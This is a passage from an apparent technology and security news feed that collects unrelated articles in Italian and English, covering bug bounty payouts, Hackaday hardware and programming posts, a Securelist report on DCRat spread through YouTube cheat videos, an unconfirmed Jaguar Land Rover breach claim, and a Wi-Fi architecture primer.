Di conseguenza, nel 2024, gli esperti che hanno segnalato vulnerabilità nelle app mobili di Android e Google hanno ricevuto 3,3 milioni di dollari e il numero di segnalazioni di errori critici e gravi è aumentato, sullo sfondo di una diminuzione del numero complessivo di bug.

Altri 137 ricercatori che hanno segnalato problemi in Chrome hanno ricevuto ricompense per un totale di 3,4 milioni di dollari. La ricompensa più alta era di 100.115 dollari, cifra pagata per aver scoperto un problema di bypass di MiraclePtr. Vale la pena notare che nell’agosto dell’anno scorso Google ha aumentato la ricompensa per chi ha aggirato MiraclePtr a 250.128 dollari.

Inoltre, dal lancio del programma bug bounty Cloud VRP nell’ottobre 2024, l’azienda ha ricevuto oltre 400 segnalazioni di vulnerabilità e ha pagato ai ricercatori oltre 500.000 dollari. L’azienda ha pagato più di 290.000 dollari per i problemi segnalati tramite il programma Abuse VRP.

Nell’ambito del programma bug bounty per la ricerca di errori nell’intelligenza artificiale, l’azienda ha ricevuto più di 150 segnalazioni da specialisti e alla fine ha pagato loro più di 55.000 dollari in ricompense.

Altri 370.000 dollari sono stati spesi in incentivi per due eventi bugSWAT. I cacciatori di bug che hanno partecipato al concorso volto a individuare problemi nei prodotti LLM hanno ricevuto più di 87.000 dollari.

L'articolo 11,8 Milioni Di Dollari è la cifra record che Google da ai cacciatori di bug: ecco chi ha incassato di più! proviene da il blog della sicurezza informatica.

If you were one of the earliest of early adopters in the home computing revolution, you might have had to settle for paper tape mass storage. It was slow, it was bulky, but it was what you had, and that gave it a certain charm that’s hard to resist. And that charm is what [Joshua Coleman] captures with this DIY paper tape reader build.

If the overall style of this project looks familiar, it’s because it was meant to echo the design themes from [Joshua]’s Coleman Z-80 modular computer. The electronics of the reader are based on [David Hansel]’s take on a paper tape reader, which in turn was meant to complement his Altair 8080 simulator — it’s retrocomputers all the way down! [Joshua]’s build has a few bells and whistles to set it apart, though, including an adjustable read head, parametric 3D-printed reels, and a panel mounted ammeter, just because. He also set it up to be a sort of keyboard wedge thanks to an internal relay that bypasses the reader unless it’s actually playing back a tape. Playback speed is pretty fast; see the video below for details.

So far, writing the tapes is an offline process. [Joshua] uses a Python program to convert ASCII to an SVG file and uses a laser cutter to burn holes in lengths of paper, which are then connected together to form a longer tape. A logical next step might be to build a feeder that moves a paper tape across the bed of the laser cutter in sync with the conversion program, to create continuous paper tapes. Or, there’s always the old-school route of solenoid-powered punch and die. We’d be thrilled with either.

youtube.com/embed/FqEwnl9ZPYk?…

hackaday.com/2025/03/11/classy…

We have all seen optimistic claims for electronic products which fail to match the reality, and [Electronic Wizard] is following one up in a recent video. Can a relatively small IGBT really switch 200 A as claimed by a dubious seller? Off to the datasheet to find out!

The device in question is from Toshiba, and comes in a TO-220 package. This itself makes us pause for a minute, because we suspect the pins on a TO220 would act more like fuses at a steady 200 A.

But in the datasheet, there it is, 200 A. Which would be great, but of course it turns out that this is the instantaneous maximum current for a few microsecond pulse. Even then it’s not finished, because while the continuous current is supposed to he half that, in the datasheet it specifies a junction temperature of 25 Celsius. The cooling rig required to maintain that whit this transistor passing 200 A would we think be a sight to behold, so for all intents and purposes this can’t even switch a continuous 100 A. The real figure is much less as you’d imagine, but it raises an important point. We blindly read datasheets and trust them, but sometimes we should engage brain before releasing the magic smoke.

youtube.com/embed/sIabnsGmGBY?…

hackaday.com/2025/03/11/lies-d…

[Simon Willison] has put together a list of how, exactly, one goes about using a large language models (LLM) to help write code. If you have wondered just what the workflow and techniques look like, give it a read. It’s full of examples, strategies, and useful tips for effectively using AI assistants like ChatGPT, Claude, and others to do useful programming work.

It’s a very practical document, with [Simon] emphasizing realistic expectations and the importance of managing context (both in terms of giving the LLM direction, as well as the model’s context in terms of being mindful of how much the LLM can fit in its ‘head’ at once.) It is useful to picture an LLM as a capable and obedient but over-confident programming intern or assistant, albeit one that never gets bored or annoyed. Useful work can be done, but testing is crucial and human oversight simply cannot be automated away.

Even if one has no interest in using LLMs to help in writing production code, there’s still a lot of useful work they can do to speed up the process of software development in general, especially when learning. They can help research options, interactively explore unfamiliar codebases, or prototype ideas quickly. [Simon] provides useful strategies for all these, and more.

If you have wondered how exactly glorified chatbots can meaningfully help with software development, [Simon]’s writeup hopefully gives you some new ideas. And if this is is all leaving you curious about how exactly LLMs work, in the time it takes to enjoy a warm coffee you can learn how they do what they do, no math required.

hackaday.com/2025/03/11/how-to…

We’re used to low cost parts and a diversity of electronic functions to choose from in our projects, to the extent that our antecedents would be green with envy. Back when tubes were king, electronics was a much more expensive pursuit with new parts, so designers had to be much more clever in their work. [Thomas Scherrer OZ2CPU] has just such a design on his bench, it’s a Heathkit Capaci-Tester designed in 1959, and we love it for the clever tricks it uses.

It’s typical of Heathkits of this era, with a sturdy chassis and components mounted on tag strips. As the name suggests, it’s a capacitor tester, and it uses a magic eye tube as its display. It’s looking for short circuits, open circuits, and low equivalent resistance, and it achieves this by looking at the loading the device under test places on a 19 MHz oscillator. But here comes that economy of parts; there’s no rectifier so the circuit runs on an AC HT voltage from a transformer, and that magic eye tube performs the task of oscillator as well as display.

He finds it to be in good condition in the video below the break, though he removes a capacitor placed from one of the mains input lines to chassis. It runs, and confirms his test capacitor is still good. It can’t measure the capacitance, but we’re guessing the resourceful engineer would also have constructed a bridge for that.

youtube.com/embed/fctP5mRQldE?…

hackaday.com/2025/03/11/a-magi…

Credit: Markus Kohlpaintner
Although taken for granted these days, autofocus (AF) used to be a premium feature on film- and digital cameras, with [Markus Kohlpaintner] taking us through an exhaustive overview of Canon’s AF systems and how they work. On Canon cameras AF became a standard feature with the introduction of its EF lenses in 1987, which are found on its EOS SLR (single-lens reflex) series of professional and prosumer cameras.

Over the decades, Canon has used many different AF drive mechanisms within these lenses, all with their own pros and cons. The article goes through each of them, starting with the original Arc-Form Drive (AFD) and ending with the newest Voice Coil Motor (VCM), showing their internal construction. Of note are the USM (ultrasonic motor) types of AF systems that use a piezoelectric motor, the functioning of which using a traveling wave across the stator is also detailed, including the integrated feedback control system.

Ultimately the end user is mostly concerned with how well the AF works, of course. Here the biggest difference is probably whether manual adjustment is possible, with not all AF systems supporting full-time manual adjustment. With the newer AF systems this manual adjustment is now performed digitally rather than with a direct coupling. Although few people probably give AF much thought, it’s fascinating to see how much engineering went into these complex systems before even touching upon the algorithms that decide what to focus on in a scene.

hackaday.com/2025/03/11/a-deep…

[Alex] of YouTube channel [EastMakes] wrote into tell me about his fantastic QWERTY ‘hexpansion’ board for the 2024 EMF Tildagon badge, and [Alex], I’m super glad you did. The system works!

Let’s back up a bit. Essentially, the idea is to have a badge that can be used beyond a single camp, with the creation of expansion boards being the other main attraction. Our own [Jenny List] covered the badge in detail back in June 2024 when she got her hands on one.

Image by [EastMakes] via YouTube[Alex] started by importing the Tildagon into Fusion360 and designing a way for the keyboard to attach to it physically. He then modeled the keyboard after the Blackberry types that can be found on Ali using the official EMF buttons established in earlier badges.

This QWERTY hexpansion is based on the RP2040, which is soldered around back and visible through the 3D-printed backplate. In order for the 90°-oriented board to align with the… not-90° connector, [Alex] built a little meander into the PCB.

The default OS on the Tildagon doesn’t know natively what to do with the serial messages from the keyboard, so [Alex] wrote an application that reads them in and decodes them. Be sure to check out the build and walk-through video after the break.

youtube.com/embed/5mLt09UtY2E?…

More, Children, Is Just a Slot Away

[New-Concentrate6308] is cooking up something new in the form of a 50% keyboard with a cartridge slot! The custom layout has been dubbed Esul, and has the Esc to the left of Tab, among other other interesting features.

Image by [New-Concentrate6308] via redditInspired by [mujimanic]’s giga 40, the cartridges add modules to the keyboard. If you want a screen, just slot one in. You could also up the RGB, or add something useful like a knob, or even some more keys.

You may have noticed the lack of an up arrow key. It’s there, it’s just a tap away on the right Shift, which if you hold it down, becomes Shift.

This thing is not going to be for everyone, but that’s not the point. (Is it ever?) The point is that [New-Concentrate6308] wanted a fun keyboard project and found it in spades. Plus, it looks fantastic.

The Centerfold: At the Corner of Practical and Paradise

Image by [jamesvyn] via redditDo I really need to say anything here? Can we all just enjoy the beauty of Switzerland for a moment?

[jamesvyn] recently switched from two monitors to a wide boi and is loving every minute of it. I particularly like the base — something about that shape is quite pleasing.

I bet it was difficult to find a wallpaper that does the view any justice. I have almost no details here, but I can tell you that the pager-looking thing near the mouse is a Pomodoro timer. And that’s an interesting wrist rest block-thing. Not sure I could use that for an extended period of time. Could you?

Do you rock a sweet set of peripherals on a screamin’ desk pad? Send me a picture along with your handle and all the gory details, and you could be featured here!

Historical Clackers: the Oliver

Today, we can not only see what we type as we type it, we can do things like correct entire words with a simple key combination (Ctrl + Backspace).
An Oliver no. 2 machine. Image via The Antikey Chop
In the late 1800s, though, seeing what you were typing as well as we do now was a pipe dream until the Oliver typewriter came along. It is thought that inventor Rev. Thomas Oliver sought to create a machine that would make his sermons more legible.

Oliver typewriters were quite distinct with their three-row keyboards and so-called ‘batwing’ typebar arrangement. This style, wherein the typebars struck the platen downward instead of upward made it a partially visible typewriter. Since it would be years until fully visible Underwoods and Royals came along, this made the Oliver quite the sought-after machine.

Unfortunately, this three-row design did not stay in vogue. As the four-row, single-Shift layout became standard, the writing was on the wall for the Oliver. Adding a fourth row of keys would have meant even taller batwings and an even heavier machine.

Some Oliver models were re-badged for foreign markets and carried names such as Courier, Stolzenberg, Jwic, Fiver, and Revilo. Stateside, the No. 2 was rebranded by Sears & Roebuck as the Woodstock.

Finally, the Clicks Keyboard Case Comes to Android

Do you miss your Blackberry or Sidekick? I miss my Palm Centro’s bubble-poppy keyboard, and I’d love to have a Sidekick or something comparable today. Or like, anything with a keyboard.

Image by [Clicks] via New AtlasIf you don’t mind having an even bigger phone, then the dream is alive in the form of the Clicks keyboard case, which has finally made its way to Android phones beginning with the the Google Pixel 9 and 9 Pro.

The Android Clicks cases will be even better than those created for the iPhone, with upgrades like larger, backlit, domed metal keys, a flexible TPU shell, and a felt lining to protect the phone. Also, there will be Qi wireless charging right through the case, which will accept magnetic accessories as well.

While cases for the Pixel 9s are available for pre-order at $99, there is also the option to reserve Clicks for the 2024 Motorola razr as well as the Samsung Galaxy S25. Check out the overview video if you want to know more, and you can also see it in action on the aforementioned phones.

Or — hear me out — we could just get devices with physical keyboards again. There’s obviously a demand. Your move, manufacturers.

Got a hot tip that has like, anything to do with keyboards? Help me out by sending in a link or two. Don’t want all the Hackaday scribes to see it? Feel free to email me directly.

hackaday.com/2025/03/11/keebin…

Unless you’ve got an especially small lap, calling the Toshiba Libretto a laptop is a bit of a stretch. The diminutive computers from the mid-1990s had a lot of the usual laptop features, but in an especially compact and portable case that made them a great choice for anyone with an on-the-go lifestyle.

Fast-forward thirty years or so, and the remaining Librettos haven’t fared too well. Many of them have cases that crumble at the slightest touch, which is what led [polymatt] to undertake this meticulous case replacement. The effort started with a complete teardown; luckily, the lower aluminum-alloy shell was in fine shape, but the upper case parts were found to be almost too deteriorated to handle. Still, with a little patience and the judicious application of tape, [polymatt] was able to scan the case pieces on a flatbed scanner and import them into his CAD package. Great tip on the blue-tack for leveling the parts for accurate scanning, by the way.

After multiple rounds of printing and tweaking, [polymatt] had a case good enough to reassemble the Libretto. Unfortunately, the previous owner left an unwanted gift: a BIOS password. Disconnecting the CMOS battery didn’t reset it, but a little research told him that shorting a few pins on the parallel port on the machine’s dock should do the trick. It was a bit involved, requiring the design and subsequent bodging of a PCB to fit into the docking port connector, but in the end he was able to wake up a machine to all its Windows 95 glory. Better get patching.

In a time when laptops were more like lap-crushers, the Libretto was an amazing little machine, and thirty years on, they’re well worth saving from the scrap heap. Hats off to [polymatt] for the effort to save this beauty, and if he needs tips on reading data from any PCMCIA cards that may have come with it, we’ve got him covered.

youtube.com/embed/AdeswJreJ98?…

hackaday.com/2025/03/11/tiny-l…

In the world of programming languages it often feels like being stuck in a Groundhog Day-esque loop through purgatory, as effectively the same problems are being solved over and over, with previous solutions forgotten and there’s always that one jubilant inventor stumbling out of a darkened basement with the One True Solution to everything that plagues this world beset by the Unspeakable Horror that is the C programming language.

As the latest entry to pledge its fealty at the altar of the Church of the Holy Memory Safety, TrapC promises to fix C, while also lambasting Rust for allowing that terrible unsafe keyword. Of course, since this is yet another loop through purgatory, the entire idea that the problem is C and some perceived issue with this nebulous ‘memory safety’ is still a red herring, as pointed out previously.

In other words, it’s time for a fun trip back to the 1970s when many of the same arguments were being rehashed already, before the early 1980s saw the Steelman language requirements condensed by renowned experts into the Ada programming language. As it turns out, memory safety is a miniscule part of a well-written program.

It’s A Trap

Pretty much the entire raison d’être for new programming languages like TrapC, Rust, Zig, and kin is this fixation on ‘memory safety’, with the idea being that the problem with C is that it doesn’t check memory boundaries and allows usage of memory addresses in ways that can lead to Bad Things. Which is not to say that such events aren’t bad, but because they are so obvious, they are also very easy to detect both using static and dynamic analysis tools.

As a ‘proposed C-language extension’, TrapC would add:

• memory-safe pointers.
• constructors & destructors.
• the trap and alias keywords.
• Run-Time Type Information.

It would also remove:

• the goto and union keywords.

The author, Robin Rowe, freely admits to this extension being ‘C++ like’, which takes us right back to 1979 when a then young Danish computer scientist (Bjarne Stroustrup) created a C-language extension cheekily called ‘C++’ to denote it as enhanced C. C++ adds many Simula features, a language which is considered the first Object-Oriented (OO) programming language and is an indirect descendant of ALGOL. These OO features include constructors and destructors. Together with (optional) smart pointers and the bounds-checked strings and containers from the Standard Template Library (STL) C++ is thus memory safe.

So what is the point of removing keywords like goto and union? The former is pretty much the most controversial keyword in the history of programming languages, even though it derives essentially directly from jumps in assembly language. In the Ada programming language you also have the goto keyword, with it often used to provide more flexibility where restrictive language choices would lead to e.g. convoluted loop constructs to the point where some C-isms do not exist in Ada, like the continue keyword.

The union keyword is similarly removed in TrapC, with the justification that both keywords are ‘unsafe’ and ‘widely deprecated’. Which makes one wonder how much real-life C & C++ code has been analyzed to come to this conclusion. In particular in the field of embedded- and driver programming with low-level memory (and register) access the use of union is widely used for the flexibility it offers.

Of course, if you’re doing low-level memory access you’re also free to use whatever pointer offset and type casting you require, together with very unsafe, but efficient, memcpy() and similar operations. There is a reason why C++ doesn’t forbid low-level access without guardrails, as sometimes it’s necessary and you’re expected to know what you’re doing. This freedom in choosing between strict memory safety and the untamed wilds of C is a deliberate design choice in C++. In embedded programming you tend to compile C++ with both RTTI & exceptions disabled as well due to the overhead from them.

Don’t Call It C++

Effectively, TrapC adds RTTI, exceptions (or ‘traps’), OO classes, safe pointers, and similar C++ features to C, which raises the question of why it’s any different, especially since the whitepaper describes TrapC and C++ code usually looking the same as a feature. Here the language seems to regard itself as being a ‘better C++’, mostly in terms of exception handling and templates, using ‘traps’ and ‘castplates’. Curiously there’s not much focus on “resource allocation is initialization” (RAII) that is such a cornerstone of C++.

Meanwhile castplates are advertised as a way to make C containers ‘typesafe’, but unlike C++ templates they are created implicitly using RTTI and one might argue somewhat opaque (C++ template-like) syntax. There are few people who would argue that C++ template code is easy to read. Of note here is that in embedded programming you tend to compile C++ with both RTTI & exceptions disabled due to the overhead from them. The extensive reliance on RTTI in TrapC would seem to preclude such an option.

Circling back on the other added keyword, alias, this is TrapC’s way to providing function overloading, and it works like a C preprocessor #define:
void puts(void* x) alias printf("{}n",x);
Then there is the new trap keyword that’s apparently important enough to be captured in the extension’s name. These are offered as an alternative to C++ exceptions, but the description is rather confusing, other than that it’s supposedly less complicated and does not support cascading exceptions up the stack. Here I do not personally see much value either way, as like so many C++ developers I loathe C++ exceptions with the fire of a thousand Suns and do my utmost to avoid them.

My favorite approach here is found in Ada, which not only cleanly separates functions and procedures, but also requires, during compile time, that any return value from a function is handled, and implements exceptions in a way that is both light-weight and very informative, as I found for example while extensively using the Ada array type in the context of a lock-free ring buffer. During testing there were zero crashes, just the program bailing out with an exception due to a faulty offset into the array and listing the exact location and cause, as in Ada everything is bound-checked by default.

Memory Safety

Much of the safety in TrapC would come from managed pointers, with its author describing TrapC’s memory management as ‘automatic’ in a recent presentation at an ISO C meeting. Pointers are lifetime-managed, but as the whitepaper states, the exact method used is ‘implementation defined’, instead of reference counting as in the C++ specification.

Yet none of this matters in the context of actual security issues. As I noted in 2024, the ‘red herring’ part refers to the real-life security issues that are captured in CVEs and their exploitation. Virtually all of the worst CVEs involve a lack of input validation, which allows users to access data in ‘restricted’ folders and gain access to databases and other resources. None of which involve memory safety in any way or form, and thus the onus lies on preventing logic errors, solid input validation and preventing lazy or inattentive programmers from introducing the next world-famous CVE.

As a long-time C & C++ programmer, I have come to ‘love’ the warts in these languages as well as the lack of guardrails for the freedom they provide. Meanwhile I have learned to write test cases and harnesses to strap my code into for QA sessions, because the best way to validate code is by stressing it. Along the way I have found myself incredibly fond of Ada, as its focus on preventing ambiguity and logic errors is self-evident and regularly keeps me from making inattentive mistakes. Mistakes that in C++ would show up in the next test and/or Valgrind cycle followed by a facepalm moment and recompile, yet somehow programming in Ada doesn’t feel more restrictive than writing in C++.

Thus I’ll keep postulating that the issues with C were already solved in 1983 with the introduction of Ada, and accepting this fact is the only way out of this endless Groundhog Day purgatory.

hackaday.com/2025/03/11/trapc-…

Popular Science has an excellent article on how Josephine Cochrane transformed how dishes are cleaned by inventing an automated dish washing machine and obtaining a patent in 1886. Dishwashers had been attempted before, but hers was the first with the revolutionary idea of using water pressure to clean dishes placed in wire racks, rather than relying on some sort of physical scrubber. The very first KitchenAid household dishwashers were based on her machines, making modern dishwashers direct descendants of her original design.
Josephine Cochrane (née Garis)
It wasn’t an overnight success. Josephine faced many hurdles. Saying it was difficult for a woman to start a venture or do business during this period of history doesn’t do justice to just how many barriers existed, even discounting the fact that her late husband was something we would today recognize as a violent alcoholic. One who left her little money and many debts upon his death, to boot.

She was nevertheless able to focus on developing her machine, and eventually hired mechanic George Butters to help create a prototype. The two of them working in near secrecy because a man being seen regularly visiting her home was simply asking for trouble. Then there were all the challenges of launching a product in a business world that had little place for a woman. One can sense the weight of it all in a quote from Josephine (shared in a write-up by the USPTO) in which she says “If I knew all I know today when I began to put the dishwasher on the market, I never would have had the courage to start.”

But Josephine persevered and her invention made a stir at the 1893 World’s Fair in Chicago, winning an award and mesmerizing onlookers. Not only was it invented by a woman, but her dishwashers were used by restaurants on-site to clean tens of thousands of dishes, day in and day out. Her marvelous machine was not yet a household device, but restaurants, hotels, colleges, and hospitals all saw the benefits and lined up to place orders.

Early machines were highly effective, but they were not the affordable, standard household appliances they are today. There certainly existed a household demand for her machine — dishwashing was a tedious chore that no one enjoyed — but household dishwashing was a task primarily done by women. Women did not control purchasing decisions, and it was difficult for men of the time (who did not spend theirs washing dishes) to be motivated about the benefits. The device was expensive, but it did away with a tremendous amount of labor. Surely the price was justified? Yet women themselves — the ones who would benefit the most — were often not on board. Josephine reflected that many women did not yet seem to think of their own time and comfort as having intrinsic value.

Josephine Cochrane ran a highly successful business and continued to refine her designs. She died in 1913 and it wasn’t until the 1950s that dishwashers — direct descendants of her original design — truly started to become popular with the general public.

Nowadays, dishwashers are such a solved problem that not only are they a feature in an instructive engineering story, but we rarely see anyone building one (though it has happened.)

We have Josephine Cochrane to thank for that. Not just her intellect and ingenuity in coming up with it, but the fact that she persevered enough to bring her creation over the finish line.

hackaday.com/2025/03/11/joseph…

Since the beginning of the year, we’ve been tracking in our telemetry a new wave of DCRat distribution, with paid access to the backdoor provided under the Malware-as-a-Service (MaaS) model. The cybercriminal group behind it also offers support for the malware and infrastructure setup for hosting the C2 servers.

Distribution

The DCRat backdoor is distributed through the YouTube platform. Attackers create fake accounts or use stolen ones, then upload videos advertising cheats, cracks, gaming bots and similar software. In the video description is a download link to the product supposedly being advertised. The link points to a legitimate file-sharing service where a password-protected archive awaits, the password for which is also in the video description.

YouTube video ad for a cheat and crack

Instead of gaming software, these archives contain the DCRat Trojan, along with various junk files and folders to distract the victim’s attention.

Archives with DCRat disguised as a cheat and crack

Backdoor

The distributed backdoor belongs to a family of remote access Trojans (RATs) dubbed Dark Crystal RAT (DCRat for short), known since 2018. Besides backdoor capability, the Trojan can load extra modules to boost its functionality. Throughout the backdoor’s existence, we have obtained and analyzed 34 different plugins, the most dangerous functions of which are keystroke logging, webcam access, file grabbing and password exfiltration.

DCRat builder plugins on the attackers’ site

Infrastructure

To support the infrastructure, the attackers register second-level domains (most often in the RU zone), which they use to create third-level domains for hosting the C2 servers. The group has registered at least 57 new second-level domains since the start of the year, five of which already serve more than 40 third-level domains.

A distinctive feature of the campaign is the appearance of certain words in the second-level domains of the malicious infrastructure, such as “nyashka”, “nyashkoon”, “nyashtyan”, etc. Users interested in Japanese pop culture will surely recognize these slang terms. Among anime and manga fans, “nyasha” has come to mean “cute” or “hon”, and it’s this word that’s most often seen in the second-level domains.

C2 server addresses with characteristic naming approach

Victims

Based on our telemetry data since the beginning of 2025, 80% of DCRat samples using such domains as C2 servers were downloaded to the devices of users in Russia. The malware also affected a small number of users from Belarus, Kazakhstan and China.

Conclusion

Kaspersky products detect the above-described samples with the verdict
Backdoor.MSIL.DCRat.
Note that we also encounter campaigns distributing other types of malware (stealers, miners, loaders) through password-protected archives, so we strongly recommend downloading game-related software only from trusted sources.

securelist.com/new-wave-of-att…

Il mondo della cybersecurity potrebbe essere di fronte a un nuovo possibile attacco che avrebbe colpito una delle icone dell’automotive britannico. Jaguar Land Rover (JLR), il prestigioso produttore di veicoli di lusso, sarebbe stato menzionato in un presunto Data Breach rivendicato da un cybercriminale noto come “Rey”, che affermerebbe di aver ottenuto e pubblicato dati aziendali altamente sensibili.

Al momento, non possiamo confermare la veridicità della notizia, poiché l’organizzazione non ha ancora rilasciato alcun comunicato stampa ufficiale sul proprio sito web riguardo l’incidente. Pertanto, questo articolo deve essere considerato come ‘fonte di intelligence’.

Dettagli del post nel Forum Underground

Secondo quanto riportato nel post sul Dark Web, il presunto data breach includerebbe circa 700 documenti interni, tra cui development logs, tracking data e persino codice sorgente. Inoltre, si parla di un set di dati dei dipendenti che conterrebbe informazioni sensibili come nome utente, e-mail, nome visualizzato, fuso orario e altro ancora.

Se queste informazioni fossero autentiche, potrebbero includere dati riservati su progetti in sviluppo, strategie aziendali e informazioni personali dei dipendenti, con possibili rischi legati a furti d’identità, attacchi di spear phishing e spionaggio industriale. Quali sarebbero le conseguenze per JLR? Se il leak contenesse informazioni su modelli futuri o innovazioni tecnologiche, il danno potrebbe estendersi ben oltre il singolo attacco, impattando la competitività dell’azienda nel lungo periodo.

Un attacco mirato o una falla sfruttata?

Al momento, non ci sono conferme ufficiali sulla dinamica dell’attacco, né sulla sua autenticità. Non è chiaro se si tratti di un’infiltrazione mirata o se Rey avrebbe semplicemente sfruttato una vulnerabilità nei sistemi di JLR. Tuttavia, le informazioni circolate suggerirebbero una possibile preparazione accurata e un’azione coordinata. Se vero, sarebbe un segnale allarmante per l’intero settore automotive, sempre più esposto alle minacce informatiche.

Un segnale d’allarme per il settore automotive?

Se confermato, questo attacco non sarebbe un caso isolato: il settore automobilistico è sempre più nel mirino dei cybercriminali, che vedono nelle aziende automotive un’enorme quantità di dati preziosi e infrastrutture critiche da compromettere. Con l’avvento dei veicoli connessi e delle supply chain digitalizzate, il rischio di intrusioni informatiche diventa sempre più elevato.

Conclusione

Ancora una volta, se queste informazioni fossero veritiere, dimostrerebbero quanto sia cruciale adottare strategie di sicurezza avanzate e rafforzare le misure di protezione per prevenire fughe di dati e attacchi devastanti. La domanda che rimane aperta è: quanto è davvero preparato il settore automotive a contrastare questa escalation di minacce?

Come nostra consuetudine, lasciamo sempre spazio ad una dichiarazione da parte dell’azienda qualora voglia darci degli aggiornamenti sulla vicenda. Saremo lieti di pubblicare tali informazioni con uno specifico articolo dando risalto alla questione.

RHC monitorerà l’evoluzione della vicenda in modo da pubblicare ulteriori news sul blog, qualora ci fossero novità sostanziali. Qualora ci siano persone informate sui fatti che volessero fornire informazioni in modo anonimo possono utilizzare la mail crittografata del whistleblower.

L'articolo Jaguar Land Rover nel mirino: un Threat Actor rivendica la pubblicazione di dati riservati! proviene da il blog della sicurezza informatica.

How many cars go down your street each day? How fast were they going? What about folks out on a walk or people riding bikes? It’s not an easy question to answer, as most of us have better things to do than watch the street all day and keep a tally. But at the same time, this is critically important data from an urban planning perspective.

Of course, you could just leave it to City Hall to figure out this sort of thing. But what if you want to get a speed bump or a traffic light added to your neighborhood? Being able to collect your own localized traffic data could certainly come in handy, which is where TrafficMonitor.ai from [glossyio] comes in.

This open-source system allows the user to deploy an affordable monitoring device that will identify vehicles and pedestrians using a combination of machine learning object detection and Doppler radar. The system not only collects images of all the objects that pass by but can even determine their speed and direction. The data is stored and processed locally and presented via a number of graphs through the system’s web-based user interface.

While [glossyio] hopes to sell kits and even pre-built monitors at some point, you’ll have to build the hardware yourself for now. The documentation recommends a Raspberry Pi 5 for the brains of your monitor, backed up by a Coral AI Tensor Processing Unit (TPU) to help process the images coming in via the Pi Camera Module 3.

Technically, the OPS243-A Doppler radar sensor is listed as optional if you’re on a tight budget, but it looks like you’ll lose speed and direction sensing without it. Additionally, there’s support for adding an air quality sensor to see what all those passing cars are leaving behind.

This isn’t the first time we’ve seen the Raspberry Pi used as an electronic traffic cop, but it’s undoubtedly the most polished version of the concept we’ve come across. You might consider passive radar, too.

hackaday.com/2025/03/11/homebr…

Le reti wireless IEEE 802.11, meglio note come Wi-Fi, sono il cuore pulsante della connettività moderna. Da soluzione di nicchia per uso domestico a pilastro tecnologico per l’Internet delle Cose (IoT), le smart cities e le infrastrutture aziendali, il Wi-Fi si è evoluto diventando inarrestabile. Oggi, nel 2025, l’arrivo di Wi-Fi 7 (IEEE 802.11be) porta velocità teoriche oltre i 46 Gb/s e latenze sotto il millisecondo, ma con esso emergono nuove sfide: sicurezza, interferenze e gestione dello spettro.

In questo articolo, parte della rubrica Wi-Fi di Red Hot Cyber, analizziamo i fondamenti delle reti IEEE 802.11, esplorando la loro architettura, il funzionamento del segnale, i vantaggi e i limiti. L’obiettivo è comprendere non solo le potenzialità del Wi-Fi 7, ma anche le sfide emergenti, in particolare quelle legate alla sicurezza informatica e alla gestione dello spettro.

Perché il Wi-Fi Domina (e Dove Inciampa)

Immaginate un mondo senza Wi-Fi: niente smartphone connessi, niente smart home, niente uffici senza grovigli di cavi. Il Wi-Fi ha conquistato il pianeta grazie a quattro punti di forza:

• Mobilità pura: Ti muovi, resti connesso. Dai magazzini robotizzati ai campus universitari, è un game-changer.
• Costi abbattuti: Niente cablaggi significa installazioni rapide e risparmi del 30-40% rispetto all’Ethernet [1]. Perfetto per edifici storici o strutture temporanee.
• Velocità da urlo: Con Wi-Fi 7, il Multi-Link Operation (MLO) sfrutta simultaneamente le bande a 2,4, 5 e 6 GHz, spingendo il throughput a livelli mai visti.
• Flessibilità estrema: Da una LAN casalinga a un’azienda con migliaia di dispositivi, il Wi-Fi si adatta.

Ma non è tutto oro quel che luccica. La trasmissione via onde radio lo rende vulnerabile: un attaccante con un’antenna direzionale può intercettare segnali a distanza, e anche il WPA3 non è immune a exploit sofisticati. Poi ci sono le interferenze – microonde e Bluetooth congestionano i 2,4 GHz, mentre i 6 GHz richiedono strategie avanzate per evitare overlap. Infine, la portata: regolamenti come quelli ETSI (20-30 dBm) limitano la copertura a 100-200 metri all’aperto, e dentro casa un muro di cemento può dimezzarla.

Come Funziona: l’Architettura del Wi-Fi

Il Wi-Fi si regge su un’architettura a celle, i Service Set, che definiscono come i dispositivi parlano tra loro:

IBSS (Ad Hoc): Comunicazione diretta tra dispositivi

In una rete IBSS (Independent Basic Service Set), non esiste un Access Point (AP): i dispositivi si connettono direttamente tra loro. Questo schema, noto anche come modalità Ad Hoc, è utile per scenari emergenziali o reti temporanee.

Esempio: Sensori industriali in una fabbrica o un sito di perforazione remota possono usare IBSS per scambiarsi dati direttamente, senza bisogno di un’architettura di rete complessa.

• Scenario: Un sistema di monitoraggio di gas tossici in una miniera o raffineria, in cui i sensori devono condividere letture in tempo reale con una centralina mobile senza un’infrastruttura fissa.

Funzionamento: I sensori si collegano in modalità Ad Hoc, trasmettendo informazioni critiche tra loro per generare un’allerta locale in caso di pericolo.

BSS: Reti con Access Point (AP) centralizzato

Nel Basic Service Set (BSS), un AP funge da coordinatore, gestendo i client Wi-Fi e ottimizzando la comunicazione. Questo modello è standard per ambienti domestici e aziendali.

Esempio: rete Wi-Fi 6 per piccoli uffici, con singolo AP che sfrutta OFDMA (Orthogonal Frequency-Division Multiple Access) e MU-MIMO per gestire più connessioni simultanee, assegnando porzioni di spettro in modo più efficiente.

ESS: Reti a copertura estesa con roaming continuo

L’Extended Service Set (ESS) collega più BSS attraverso un Distribution System (DS), solitamente via Ethernet o backhaul wireless. È il modello usato per garantire copertura senza interruzioni su grandi superfici.

Esempio:

• In un ospedale con handoff veloce, gli AP usano 802.11r (Fast Roaming) per garantire il passaggio fluido dei client da un AP all’altro senza dover eseguire una nuova autenticazione completa (grazie al Key Caching).
• In ambienti industriali con AGV (Automated Guided Vehicles), il Wi-Fi deve garantire roaming senza latenza. Protocolli come 802.11k/v permettono ai dispositivi di sapere in anticipo quale AP è il migliore a cui connettersi, riducendo i tempi di transizione.

Nel 2025, Wi-Fi 7 alza l’asticella: l’MLO permette di usare più bande in parallelo, riducendo latenza e aumentando affidabilità. Il risultato? Un dispositivo può passare dai 2,4 GHz (portata lunga) ai 6 GHz (alta capacità) senza che tu te ne accorga. Aggiungete canali a 320 MHz e MU-MIMO bidirezionale, e avete una rete che regge anche 50 dispositivi in una stanza senza battere ciglio.

Dopo aver visto come funziona l’architettura Wi-Fi con IBSS, BSS ed ESS per garantire connettività e roaming continuo, viene spontaneo chiedersi: cosa succede fisicamente al segnale mentre ci muoviamo da un Access Point all’altro?

Il Segnale Wi-Fi: Fisica al Lavoro

